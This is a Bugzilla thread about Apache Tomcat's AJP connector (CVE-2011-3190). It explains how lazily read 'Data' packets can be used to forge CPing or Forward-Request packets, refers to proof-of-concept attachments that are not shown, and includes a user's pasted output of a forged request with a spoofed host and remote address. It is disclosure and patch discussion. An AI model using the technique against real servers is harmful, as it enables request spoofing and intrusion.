Created attachment 27416 [details] ajp CPing packet forgery example because the ajp "Data" packet no "CodeType" and tomcat adopts lazy-reading strategy for reading ajp "Data" packet, (i.e., if you don't invoke request.getParameter("XXX"),tomcat does't read post request "Data" packet) so,the current "Data" packet keeping in the socket inputstream, the connection is keep-alive, ajp bio/nio procesor reading the next packet, this time, is "Data" packet。 if the first byte of "Data" packet'length is 0x02(Code Type of Forward Request Packet) or 0x0A(Code Type of CPing Packet), then tomcat will be in trouble. please see the attachments. firt example: ajp CPing packet forgery example second example: ajp Forward-Request packet forgery
Created attachment 27417 [details] ajp Forward-Request packet forgery second example: ajp Forward-Request packet forgery
This issue has been allocated CVE-2011-3190. The Tomcat security team strongly discourages the reporting of potential security vulnerabilities via public channels such as this issue tracker. Potential security vulnerabilities should be reported privately to security@tomcat.apache.org This issue has been fixed in trunk, 7.0.x, 6.0.x and 5.5.x and will be included in 7.0.21, 6.0.34 and 5.5.34 onwards.
Hi there, I was testing this out to see if my site was vulnerable and got the following results. I'm not sure looking at the code comments in ForwardRequestForgeryExample.java if the output below means it's vulnerable and what exactly that exploited. Could you help me out a bit please? Thanks, Ed. C:>java -cp . ForwardRequestForgeryExample Sending AJP Forward-Request Packet... End $ tail -f catalina.out Invoke HelloWorldExample.doPost method: ------------------------------------------- Host: my.evil-site.com RemoteAddr: 1.2.3.4 LocalPort: 999 woo: I am here
Bugzilla is not a support forum. Please use the users mailing list.
Sorry about that. Will do.